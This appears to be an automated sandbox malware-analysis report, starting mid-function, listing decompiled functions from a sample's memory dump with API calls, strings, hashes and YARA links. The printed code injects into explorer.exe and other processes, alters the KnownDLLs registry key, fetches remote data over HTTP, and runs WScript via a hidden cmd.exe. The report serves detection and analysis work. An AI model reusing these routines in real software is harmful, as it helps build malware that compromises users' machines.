				void* _t44;
				void* _t46;
				void* _t47;

				_t37 = __ecx;
				E01461BB0( &_v5136, 0, 0x1000);
				E01461BB0( &_v1036, 0, 0x404);
				E01461670( &_v1036, 0, 0x404);
				_v1036 = GetCurrentProcessId();
				E01461A00( &_v1032, "C:\Users\alfons\AppData\Local\Temp\4rC1bQcnl5.exe");
				_t46 = _t44 + 0x2c;
				_push(_t35);
				_push(_t41);
				_push(_t39);
				L1:
				while(1) {
					if( *0x1631314 == 0) {
						_t24 = E01467EF0("explorer.exe");
						_t47 = _t46 + 4;
						if(_t24 != 0) {
							_t37 =  &_v1036;
							E014629E0( &_v1036, 0x1460000, _t24,  &_v1036, 0x404,  &_v8, E01468390);
							_t46 = _t47 + 0x18;
							goto L12;
						}
					} else {
						_v1040 = 0;
						_t35 = E014680E0(_t35, _t39, _t41, 1,  &_v5136, 0x1000);
						_t46 = _t46 + 0xc;
						if(_t35 != 0) {
							_t41 = 0;
							if(_t35 != 0) {
								while( *0x1632118 == 0) {
									_t39 =  *((intOrPtr*)(_t43 + _t41 * 4 - 0x140c));
									if(_t39 == 0 || _t39 == GetCurrentProcessId()) {
										L8:
										_t41 = _t41 + 1;
										if(_t41 < _t35) {
											continue;
										} else {
										}
									} else {
										_t34 = E014629E0(_t37, 0x1460000, _t39,  &_v1036, 0x404,  &_v8, E01468390);
										_t46 = _t46 + 0x18;
										if(_t34 == 0) {
											goto L8;
										}
									}
									goto L12;
								}
							}
							L12:
							if( *0x1632118 != 0) {
								ExitThread(0);
							}
							Sleep(0x1f4);
							continue;
						}
					}
					return 0;
				}
			}




















                                                                                                        0x01468450
                                                                                                        0x01468467
                                                                                                        0x0146847a
                                                                                                        0x0146848d
                                                                                                        0x0146849b
                                                                                                        0x014684ad
                                                                                                        0x014684b2
                                                                                                        0x014684b5
                                                                                                        0x014684b6
                                                                                                        0x014684b7
                                                                                                        0x00000000
                                                                                                        0x014684c0
                                                                                                        0x014684c7
                                                                                                        0x01468552
                                                                                                        0x01468557
                                                                                                        0x0146855c
                                                                                                        0x0146856c
                                                                                                        0x01468579
                                                                                                        0x0146857e
                                                                                                        0x00000000
                                                                                                        0x0146857e
                                                                                                        0x014684cd
                                                                                                        0x014684d8
                                                                                                        0x014684ea
                                                                                                        0x014684ec
                                                                                                        0x014684f1
                                                                                                        0x014684f7
                                                                                                        0x014684fb
                                                                                                        0x01468501
                                                                                                        0x0146850a
                                                                                                        0x01468513
                                                                                                        0x01468546
                                                                                                        0x01468546
                                                                                                        0x01468549
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x0146854b
                                                                                                        0x0146851f
                                                                                                        0x0146853a
                                                                                                        0x0146853f
                                                                                                        0x01468544
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x01468544
                                                                                                        0x00000000
                                                                                                        0x01468513
                                                                                                        0x01468501
                                                                                                        0x01468581
                                                                                                        0x01468588
                                                                                                        0x0146859c
                                                                                                        0x0146859c
                                                                                                        0x0146858f
                                                                                                        0x00000000
                                                                                                        0x0146858f
                                                                                                        0x014684f1
                                                                                                        0x014685aa
                                                                                                        0x014685aa

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        • C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exe, xrefs: 014684A7
                                                                                                        • explorer.exe, xrefs: 0146854D
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000011.00000002.495500210.0000000001460000.00000040.00000001.sdmp, Offset: 01460000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CurrentProcess$ExitSleepThread
                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exe$explorer.exe
                                                                                                        • API String ID: 970816010-4120632074
                                                                                                        • Opcode ID: a27ea501fe5a89eeaaeda0694e6a3702c435456bb227a9459b17e8f184a88c06
                                                                                                        • Instruction ID: 2866b307ed1a78f3a2a4e5e7ba188935b72a5ebae64e3412546da7c249a449e8
                                                                                                        • Opcode Fuzzy Hash: a27ea501fe5a89eeaaeda0694e6a3702c435456bb227a9459b17e8f184a88c06
                                                                                                        • Instruction Fuzzy Hash: 28315FF5A403166AEB20AA529C46FE7376C5B5474DF0400AFEB08B2175EAB05A4987B3
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 01466CA0, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49threadprocessCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 79%
                                                                                                        			E01466CA0(intOrPtr _a4) {
				struct _PROCESS_INFORMATION _v20;
				struct _STARTUPINFOW _v88;
				short _v1128;
				long _t25;

				E01461BB0( &_v88, 0, 0x44);
				asm("xorps xmm0, xmm0");
				asm("movups [ebp-0x10], xmm0");
				E01461A00( &_v1128, L"cmd.exe /C WScript \"");
				E01461970( &_v1128, _a4 - 0xffffff80);
				E01461970( &_v1128, "\"");
				_t25 = CreateProcessW(0,  &_v1128, 0, 0, 0, 0x8000000, 0, 0,  &_v88,  &_v20);
				if(_t25 != 0) {
					CloseHandle(_v20.hThread);
					CloseHandle(_v20);
					ExitThread(_v20.dwProcessId);
				}
				ExitThread(_t25);
			}







                                                                                                        0x01466cb1
                                                                                                        0x01466cbc
                                                                                                        0x01466cc5
                                                                                                        0x01466cc9
                                                                                                        0x01466cdc
                                                                                                        0x01466ced
                                                                                                        0x01466d15
                                                                                                        0x01466d1d
                                                                                                        0x01466d29
                                                                                                        0x01466d32
                                                                                                        0x01466d3b
                                                                                                        0x01466d3b
                                                                                                        0x01466d20

                                                                                                        APIs
                                                                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 01466D15
                                                                                                        • ExitThread.KERNEL32 ref: 01466D20
                                                                                                        • CloseHandle.KERNEL32(?), ref: 01466D29
                                                                                                        • CloseHandle.KERNEL32(?), ref: 01466D32
                                                                                                        • ExitThread.KERNEL32 ref: 01466D3B
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000011.00000002.495500210.0000000001460000.00000040.00000001.sdmp, Offset: 01460000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CloseExitHandleThread$CreateProcess
                                                                                                        • String ID: cmd.exe /C WScript "
                                                                                                        • API String ID: 3397019416-3599441821
                                                                                                        • Opcode ID: ba8cfc9d9555653b13776f3c57511aee66d4d2700083e32f489e188165c51f3f
                                                                                                        • Instruction ID: c99367b907e0dcb06a12959b209f6ce716a06760144b0d8a1878126d86b1e52d
                                                                                                        • Opcode Fuzzy Hash: ba8cfc9d9555653b13776f3c57511aee66d4d2700083e32f489e188165c51f3f
                                                                                                        • Instruction Fuzzy Hash: 05115EB1940209BEDB20DBE1CD49F9E777CAF25B08F200155F205E60A5EBB1A644CB56
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 01462DD0, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 29registryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E01462DD0(void* __ecx) {
				void* _v8;
				long _t8;

				_v8 = 0;
				_t8 = RegOpenKeyExW(0x80000002, L"SYSTEM\\CurrentControlSet\\Control\\Session Manager\\KnownDLLs", 0, 0xf003f,  &_v8);
				if(_t8 == 0) {
					RegSetValueExW(_v8, L"ntdll", 0, 1, L"ntdll.dll", 2 + E01461B40(L"ntdll.dll") * 2);
					return RegCloseKey(_v8);
				}
				return _t8;
			}





                                                                                                        0x01462dd7
                                                                                                        0x01462df0
                                                                                                        0x01462df8
                                                                                                        0x01462e20
                                                                                                        0x00000000
                                                                                                        0x01462e29
                                                                                                        0x01462e32

                                                                                                        APIs
                                                                                                        • RegOpenKeyExW.ADVAPI32(80000002,SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs,00000000,000F003F,01462F21), ref: 01462DF0
                                                                                                        • RegSetValueExW.ADVAPI32(00000000,ntdll,00000000,00000001,ntdll.dll,00000000), ref: 01462E20
                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 01462E29
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000011.00000002.495500210.0000000001460000.00000040.00000001.sdmp, Offset: 01460000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CloseOpenValue
                                                                                                        • String ID: SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs$ntdll$ntdll.dll
                                                                                                        • API String ID: 779948276-834112533
                                                                                                        • Opcode ID: 62af65ac8808b1e79b48f89da129e6fa7fb6170cd20fb0b64eef43b843ba6815
                                                                                                        • Instruction ID: 089bdb3bf1413dc3388721ae76e81a80b9f7ef3b6bb7756c55e3e81ceb5b78de
                                                                                                        • Opcode Fuzzy Hash: 62af65ac8808b1e79b48f89da129e6fa7fb6170cd20fb0b64eef43b843ba6815
                                                                                                        • Instruction Fuzzy Hash: 46F0A0B1681308BFEB209B91DD07FA9767CE744B0CF20005AFA01A2175E6F16A10D643
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 01464DE0, Relevance: 9.2, APIs: 2, Strings: 4, Instructions: 152sleepCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 93%
                                                                                                        			E01464DE0(short __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				char _v1784;
				intOrPtr _v1788;
				char _v1792;
				intOrPtr _v1796;
				char _v2052;
				intOrPtr _v2056;
				char _v2568;
				char _v3080;
				intOrPtr _v3084;
				char _v3148;
				char _v3276;
				intOrPtr _t41;
				intOrPtr _t42;
				intOrPtr _t43;
				void* _t46;
				char _t52;
				char _t62;
				void* _t76;
				short _t79;
				void* _t84;
				intOrPtr _t85;
				void* _t86;
				void* _t87;
				void* _t88;
				void* _t89;
				void* _t92;
				void* _t93;

				_t93 = __eflags;
				_t80 = __edx;
				_t79 = __ecx;
				E01461670( &_v3276, 0, 0xcc8);
				_t41 =  *0x1631bb4; // 0x1e
				_t81 = _a4;
				_v2056 = _t41;
				_t42 =  *0x1631bbc; // 0xa
				_v1796 = _t42;
				_t43 =  *0x1631c24; // 0x0
				_v1788 = _t43;
				_t84 = E01464B00(_t79, __edx, _t93, _a4);
				_t87 = _t86 + 0x10;
				_t94 = _t84;
				if(_t84 != 0) {
					L5:
					_t46 = E014628F0(_t84, E01465000,  &_v3276);
					_t88 = _t87 + 0xc;
					_push(_t84);
					if(_t46 >= 0) {
						E01461510();
						_t85 = _a12;
						_t89 = _t88 + 4;
						__eflags = _v2052;
						if(_v2052 != 0) {
							E014617E0(_t85 + 0x4c8,  &_v2052);
							_t89 = _t89 + 8;
						}
						__eflags = _v3276;
						if(_v3276 != 0) {
							E014617E0(_t85,  &_v3276);
							_t89 = _t89 + 8;
						}
						__eflags = _v3148;
						if(_v3148 != 0) {
							E014617E0(_t85 + 0x80,  &_v3148);
							_t89 = _t89 + 8;
						}
						__eflags = _v3080;
						if(_v3080 != 0) {
							_t82 = _t85 + 0xc4;
							E014617E0(_t85 + 0xc4,  &_v3080);
							_t89 = _t89 + 8;
							__eflags = _v1784;
							if(_v1784 != 0) {
								__eflags =  *0x1631c28;
								if( *0x1631c28 != 0) {
									_t62 = E01461740("d572da9202196121d952231f26d65d07",  &_v1784);
									_t89 = _t89 + 8;
									__eflags = _t62;
									if(_t62 != 0) {
										E014676A0(_t79, _t80, _t82, _a16, _a20,  &_v1784);
										_t89 = _t89 + 0x10;
									}
								}
							}
						}
						__eflags = _v2568;
						if(_v2568 != 0) {
							E014617E0(_t85 + 0x2c4,  &_v2568);
							_t89 = _t89 + 8;
						}
						 *((intOrPtr*)(_t85 + 0xc0)) = _v3084;
						 *((intOrPtr*)(_t85 + 0x4c4)) = _v2056;
						 *((intOrPtr*)(_t85 + 0x5c8)) = _v1796;
						 *((intOrPtr*)(_t85 + 0x5d0)) = _v1788;
						_t52 = _v1792;
						 *((intOrPtr*)(_t85 + 0x5cc)) = _t52;
						__eflags = _t52;
						if(_t52 != 0) {
							E014617E0(_t85 + 0x4c8, "d06ed635-68f6-4e9a-955c-4899f5f57b9a");
						}
						return 1;
					} else {
						E01461510();
						goto L7;
					}
				} else {
					Sleep(0x2710);
					_t84 = E01464B00(_t79, _t80, _t94, _t81);
					_t87 = _t87 + 4;
					if(_t84 != 0) {
						goto L5;
					} else {
						_t76 = E014617B0("FALSE", "FALSE");
						_t92 = _t87 + 8;
						_t96 = _t76;
						if(_t76 == 0) {
							L7:
							return 0;
						} else {
							_t83 = _a8;
							_t84 = E01464B00(_t79, _t80, _t96, _a8);
							_t87 = _t92 + 4;
							_t97 = _t84;
							if(_t84 != 0) {
								goto L5;
							} else {
								Sleep(0x2710);
								_t84 = E01464B00(_t79, _t80, _t97, _t83);
								_t87 = _t87 + 4;
								if(_t84 == 0) {
									goto L7;
								} else {
									goto L5;
								}
							}
						}
					}
				}
			}






























                                                                                                        0x01464de0
                                                                                                        0x01464de0
                                                                                                        0x01464de0
                                                                                                        0x01464df9
                                                                                                        0x01464dfe
                                                                                                        0x01464e03
                                                                                                        0x01464e06
                                                                                                        0x01464e0c
                                                                                                        0x01464e11
                                                                                                        0x01464e17
                                                                                                        0x01464e1d
                                                                                                        0x01464e28
                                                                                                        0x01464e2a
                                                                                                        0x01464e2d
                                                                                                        0x01464e2f
                                                                                                        0x01464e8d
                                                                                                        0x01464e9a
                                                                                                        0x01464e9f
                                                                                                        0x01464ea2
                                                                                                        0x01464ea5
                                                                                                        0x01464eb7
                                                                                                        0x01464ebc
                                                                                                        0x01464ebf
                                                                                                        0x01464ec2
                                                                                                        0x01464ec9
                                                                                                        0x01464ed9
                                                                                                        0x01464ede
                                                                                                        0x01464ede
                                                                                                        0x01464ee1
                                                                                                        0x01464ee8
                                                                                                        0x01464ef2
                                                                                                        0x01464ef7
                                                                                                        0x01464ef7
                                                                                                        0x01464efa
                                                                                                        0x01464f01
                                                                                                        0x01464f11
                                                                                                        0x01464f16
                                                                                                        0x01464f16
                                                                                                        0x01464f19
                                                                                                        0x01464f20
                                                                                                        0x01464f29
                                                                                                        0x01464f30
                                                                                                        0x01464f35
                                                                                                        0x01464f38
                                                                                                        0x01464f3f
                                                                                                        0x01464f41
                                                                                                        0x01464f48
                                                                                                        0x01464f56
                                                                                                        0x01464f5b
                                                                                                        0x01464f5e
                                                                                                        0x01464f60
                                                                                                        0x01464f70
                                                                                                        0x01464f75
                                                                                                        0x01464f75
                                                                                                        0x01464f60
                                                                                                        0x01464f48
                                                                                                        0x01464f3f
                                                                                                        0x01464f78
                                                                                                        0x01464f7f
                                                                                                        0x01464f8f
                                                                                                        0x01464f94
                                                                                                        0x01464f94
                                                                                                        0x01464f9d
                                                                                                        0x01464fa9
                                                                                                        0x01464fb5
                                                                                                        0x01464fc1
                                                                                                        0x01464fc7
                                                                                                        0x01464fcd
                                                                                                        0x01464fd3
                                                                                                        0x01464fd5
                                                                                                        0x01464fe3
                                                                                                        0x01464fe8
                                                                                                        0x01464ff5
                                                                                                        0x01464ea7
                                                                                                        0x01464ea7
                                                                                                        0x00000000
                                                                                                        0x01464eac
                                                                                                        0x01464e31
                                                                                                        0x01464e36
                                                                                                        0x01464e42
                                                                                                        0x01464e44
                                                                                                        0x01464e49
                                                                                                        0x00000000
                                                                                                        0x01464e4b
                                                                                                        0x01464e55
                                                                                                        0x01464e5a
                                                                                                        0x01464e5d
                                                                                                        0x01464e5f
                                                                                                        0x01464eb0
                                                                                                        0x01464eb6
                                                                                                        0x01464e61
                                                                                                        0x01464e61
                                                                                                        0x01464e6a
                                                                                                        0x01464e6c
                                                                                                        0x01464e6f
                                                                                                        0x01464e71
                                                                                                        0x00000000
                                                                                                        0x01464e73
                                                                                                        0x01464e78
                                                                                                        0x01464e84
                                                                                                        0x01464e86
                                                                                                        0x01464e8b
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x01464e8b
                                                                                                        0x01464e71
                                                                                                        0x01464e5f
                                                                                                        0x01464e49

                                                                                                        APIs
                                                                                                          • Part of subcall function 01464B00: InternetCrackUrlA.WININET(7519EA30,00000000,?,?,00000000,00000000), ref: 01464B57
                                                                                                        • Sleep.KERNEL32(00002710,?,?,7519EA30,00000000), ref: 01464E36
                                                                                                          • Part of subcall function 01464B00: InternetOpenA.WININET(WinInetGet/0.1,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,00000000,?,00000000,00000000), ref: 01464B9D
                                                                                                          • Part of subcall function 01464B00: InternetConnectA.WININET(00000000,00000000,?,00000000,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 01464BCB
                                                                                                          • Part of subcall function 01464B00: InternetCloseHandle.WININET(00000000,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000), ref: 01464BE5
                                                                                                        • Sleep.KERNEL32(00002710,?,?,?,?,?,?,7519EA30,00000000), ref: 01464E78
                                                                                                          • Part of subcall function 01464B00: HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,0146A200,846CF300,00000000), ref: 01464C52
                                                                                                          • Part of subcall function 01464B00: InternetQueryOptionA.WININET(00000000,0000001F,7519EA30,00000000), ref: 01464C8C
                                                                                                          • Part of subcall function 01464B00: InternetSetOptionA.WININET(00000000,0000001F,00000180,00000004), ref: 01464CAA
                                                                                                          • Part of subcall function 01464B00: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 01464CC1
                                                                                                          • Part of subcall function 01464B00: InternetReadFile.WININET(00000CC8,00000000,00000400,00000000), ref: 01464CF3
                                                                                                          • Part of subcall function 01464B00: InternetCloseHandle.WININET(00000CC8,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 01464D9A
                                                                                                          • Part of subcall function 01464B00: InternetCloseHandle.WININET(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 01464D9F
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000011.00000002.495500210.0000000001460000.00000040.00000001.sdmp, Offset: 01460000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Internet$CloseHandle$HttpOpenOptionRequestSleep$ConnectCrackFileQueryReadSend
                                                                                                        • String ID: FALSE$FALSE$d06ed635-68f6-4e9a-955c-4899f5f57b9a$d572da9202196121d952231f26d65d07
                                                                                                        • API String ID: 581717041-1944389977
                                                                                                        • Opcode ID: 933aa0810d28d3fab18e1f189c1724a34e0b4adfb3df17dff6c8a16a5257185c
                                                                                                        • Instruction ID: 5b30da07f50ea53e1e8088d8ede94a1cbcf5b7f59b997aa9d5af02169f5028dd
                                                                                                        • Opcode Fuzzy Hash: 933aa0810d28d3fab18e1f189c1724a34e0b4adfb3df17dff6c8a16a5257185c
                                                                                                        • Instruction Fuzzy Hash: 7251D5B1C002155BEF21DB68EC44FDBB7ECAB54619F0801ABD90CD3250EB34AA94CB93
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 01467EF0, Relevance: 9.1, APIs: 6, Instructions: 64processCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E01467EF0(intOrPtr _a4) {
				char _v264;
				intOrPtr _v292;
				void* _v300;
				void* _t13;
				void* _t21;
				void* _t29;
				void* _t30;
				void* _t31;

				_v300 = 0x128;
				_t29 = CreateToolhelp32Snapshot(2, 0);
				if(_t29 != 0xffffffff) {
					Process32First(_t29,  &_v300);
					_t26 = _a4;
					_t13 = E01461740(_a4,  &_v264);
					_t31 = _t30 + 8;
					if(_t13 == 0) {
						L7:
						CloseHandle(_t29);
						return _v292;
					} else {
						if(Process32Next(_t29,  &_v300) == 0) {
							L6:
							CloseHandle(_t29);
							return 0;
						} else {
							while(1) {
								_t21 = E01461740(_t26,  &_v264);
								_t31 = _t31 + 8;
								if(_t21 == 0) {
									goto L7;
								}
								if(Process32Next(_t29,  &_v300) != 0) {
									continue;
								} else {
									goto L6;
								}
								goto L8;
							}
							goto L7;
						}
					}
				} else {
					return 0;
				}
				L8:
			}











                                                                                                        0x01467efe
                                                                                                        0x01467f0d
                                                                                                        0x01467f12
                                                                                                        0x01467f24
                                                                                                        0x01467f29
                                                                                                        0x01467f34
                                                                                                        0x01467f39
                                                                                                        0x01467f3e
                                                                                                        0x01467f85
                                                                                                        0x01467f86
                                                                                                        0x01467f97
                                                                                                        0x01467f40
                                                                                                        0x01467f4f
                                                                                                        0x01467f76
                                                                                                        0x01467f77
                                                                                                        0x01467f84
                                                                                                        0x01467f51
                                                                                                        0x01467f51
                                                                                                        0x01467f59
                                                                                                        0x01467f5e
                                                                                                        0x01467f63
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x01467f74
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x01467f74
                                                                                                        0x00000000
                                                                                                        0x01467f51
                                                                                                        0x01467f4f
                                                                                                        0x01467f14
                                                                                                        0x01467f1a
                                                                                                        0x01467f1a
                                                                                                        0x00000000

                                                                                                        APIs
                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?), ref: 01467F08
                                                                                                        • Process32First.KERNEL32(00000000,00000128,00000001,00000002,00000000,?), ref: 01467F24
                                                                                                        • Process32Next.KERNEL32(00000000,00000128,00000000,?), ref: 01467F48
                                                                                                        • Process32Next.KERNEL32(00000000,00000128,00000000,00000128,00000000,?), ref: 01467F6D
                                                                                                        • CloseHandle.KERNEL32(00000000,00000000,00000128,00000000,?), ref: 01467F77
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000011.00000002.495500210.0000000001460000.00000040.00000001.sdmp, Offset: 01460000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Process32$Next$CloseCreateFirstHandleSnapshotToolhelp32
                                                                                                        • String ID:
                                                                                                        • API String ID: 2284531361-0
                                                                                                        • Opcode ID: a127acf32eba3c8e6e2ef316381a82c72e97d74d5dd9353b0e677753e51a5c0b
                                                                                                        • Instruction ID: d5862b2b8a57088ee57b5843bdad6965847d11aad63791e05f1a9dafb2de3b72
                                                                                                        • Opcode Fuzzy Hash: a127acf32eba3c8e6e2ef316381a82c72e97d74d5dd9353b0e677753e51a5c0b
                                                                                                        • Instruction Fuzzy Hash: 2D110C315011296BEB20A629AC40EFF73ACDF7926EF0001A7ED08D2150EB34DA5646B7
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 01468CE0, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53libraryloaderCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 58%
                                                                                                        			E01468CE0() {
				_Unknown_base(*)()* _t2;
				signed int _t3;
				signed int _t5;
				void* _t9;

				 *0x1632e0c = 0x11c;
				_t2 = GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "RtlGetVersion");
				if(_t2 != 0) {
					 *_t2(0x1632e0c);
				}
				_t3 =  *0x1632e10;
				if(_t3 == 0) {
					L22:
					return _t3;
				} else {
					_t5 = _t3 << 0x00000008 |  *0x1632e14;
					_t9 = _t5 - 0x602;
					if(_t9 > 0) {
						if(_t5 == 0x603) {
							 *0x1632e08 = 4;
							return _t5;
						}
						if(_t5 == 0xa00) {
							_t3 =  *0x1632e18;
							if(_t3 < 0x3fab) {
								if(_t3 < 0x3ad7) {
									if(_t3 < 0x3839) {
										if(_t3 < 0x295a) {
											goto L22;
										} else {
											 *0x1632e08 = 5;
											return _t3;
										}
									} else {
										 *0x1632e08 = 6;
										return _t3;
									}
								} else {
									 *0x1632e08 = 7;
									return _t3;
								}
							} else {
								 *0x1632e08 = 8;
								return _t3;
							}
						} else {
							goto L12;
						}
					} else {
						if(_t9 == 0) {
							 *0x1632e08 = 3;
							return _t5;
						} else {
							if(_t5 == 0x501) {
								 *0x1632e08 = 1;
								return _t5;
							} else {
								if(_t5 != 0x601) {
									L12:
									 *0x1632e08 = 0;
									return _t5;
								} else {
									 *0x1632e08 = 2;
									return _t5;
								}
							}
						}
					}
				}
			}







                                                                                                        0x01468cea
                                                                                                        0x01468cfb
                                                                                                        0x01468d03
                                                                                                        0x01468d0a
                                                                                                        0x01468d0a
                                                                                                        0x01468d0c
                                                                                                        0x01468d13
                                                                                                        0x01468dca
                                                                                                        0x01468dca
                                                                                                        0x01468d19
                                                                                                        0x01468d1c
                                                                                                        0x01468d22
                                                                                                        0x01468d27
                                                                                                        0x01468d5f
                                                                                                        0x01468dc0
                                                                                                        0x00000000
                                                                                                        0x01468dc0
                                                                                                        0x01468d66
                                                                                                        0x01468d73
                                                                                                        0x01468d7d
                                                                                                        0x01468d8f
                                                                                                        0x01468da1
                                                                                                        0x01468db3
                                                                                                        0x00000000
                                                                                                        0x01468db5
                                                                                                        0x01468db5
                                                                                                        0x01468dbf
                                                                                                        0x01468dbf
                                                                                                        0x01468da3
                                                                                                        0x01468da3
                                                                                                        0x01468dad
                                                                                                        0x01468dad
                                                                                                        0x01468d91
                                                                                                        0x01468d91
                                                                                                        0x01468d9b
                                                                                                        0x01468d9b
                                                                                                        0x01468d7f
                                                                                                        0x01468d7f
                                                                                                        0x01468d89
                                                                                                        0x01468d89
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x01468d29
                                                                                                        0x01468d29
                                                                                                        0x01468d4f
                                                                                                        0x01468d59
                                                                                                        0x01468d2b
                                                                                                        0x01468d30
                                                                                                        0x01468d44
                                                                                                        0x01468d4e
                                                                                                        0x01468d32
                                                                                                        0x01468d37
                                                                                                        0x01468d68
                                                                                                        0x01468d68
                                                                                                        0x01468d72
                                                                                                        0x01468d39
                                                                                                        0x01468d39
                                                                                                        0x01468d43
                                                                                                        0x01468d43
                                                                                                        0x01468d37
                                                                                                        0x01468d30
                                                                                                        0x01468d29
                                                                                                        0x01468d27

                                                                                                        APIs
                                                                                                        • GetModuleHandleW.KERNEL32(ntdll.dll,RtlGetVersion,01468DD5,01463448), ref: 01468CF4
                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 01468CFB
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000011.00000002.495500210.0000000001460000.00000040.00000001.sdmp, Offset: 01460000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AddressHandleModuleProc
                                                                                                        • String ID: RtlGetVersion$ntdll.dll
                                                                                                        • API String ID: 1646373207-1489217083
                                                                                                        • Opcode ID: 2cbd2abf0a7c773a7e44e09ae2f49d5c0cd3253c1f2d5d10204db01e652f34a0
                                                                                                        • Instruction ID: 4fe17b75e3aefe3b9d4070e83c5f787ba08c08441ff64074e7ea22fc02295324
                                                                                                        • Opcode Fuzzy Hash: 2cbd2abf0a7c773a7e44e09ae2f49d5c0cd3253c1f2d5d10204db01e652f34a0
                                                                                                        • Instruction Fuzzy Hash: 1A11EFB51407019AF735CF15ECAA71A3B99A360709FE8985ED100D62B4CBFC81A6CB76
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 01468270, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24libraryloaderCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 58%
                                                                                                        			E01468270(void* __ecx, intOrPtr _a4) {
				char _v8;
				_Unknown_base(*)()* _t6;
				void* _t8;

				_v8 = 0;
				_t6 = GetProcAddress(GetModuleHandleW(L"kernel32"), "IsWow64Process");
				if(_t6 == 0) {
					L3:
					return _v8;
				} else {
					_t8 =  *_t6(_a4,  &_v8);
					if(_t8 != 0) {
						goto L3;
					} else {
						return _t8;
					}
				}
			}






                                                                                                        0x0146827e
                                                                                                        0x0146828c
                                                                                                        0x01468294
                                                                                                        0x014682a7
                                                                                                        0x014682ad
                                                                                                        0x01468296
                                                                                                        0x0146829d
                                                                                                        0x014682a1
                                                                                                        0x00000000
                                                                                                        0x014682a6
                                                                                                        0x014682a6
                                                                                                        0x014682a6
                                                                                                        0x014682a1

                                                                                                        APIs
                                                                                                        • GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,?,?,01463432), ref: 01468285
                                                                                                        • GetProcAddress.KERNEL32(00000000,?,?,01463432), ref: 0146828C
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000011.00000002.495500210.0000000001460000.00000040.00000001.sdmp, Offset: 01460000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AddressHandleModuleProc
                                                                                                        • String ID: IsWow64Process$kernel32
                                                                                                        • API String ID: 1646373207-3789238822
                                                                                                        • Opcode ID: 6062dc9b10411a7b4b174f03fb3b4933761f5b161bcb52c12432041cb1776fdd
                                                                                                        • Instruction ID: f7e02938b62883c079bed59e491bc9c2c694de44fe7eeba39a8df68ec1d057f4
                                                                                                        • Opcode Fuzzy Hash: 6062dc9b10411a7b4b174f03fb3b4933761f5b161bcb52c12432041cb1776fdd
                                                                                                        • Instruction Fuzzy Hash: D1E04F7064470ABFDB10CFD5DC09A6E77BCDF4064DF100199F90893220EAB19A109752
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 014621A0, Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 99memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 87%
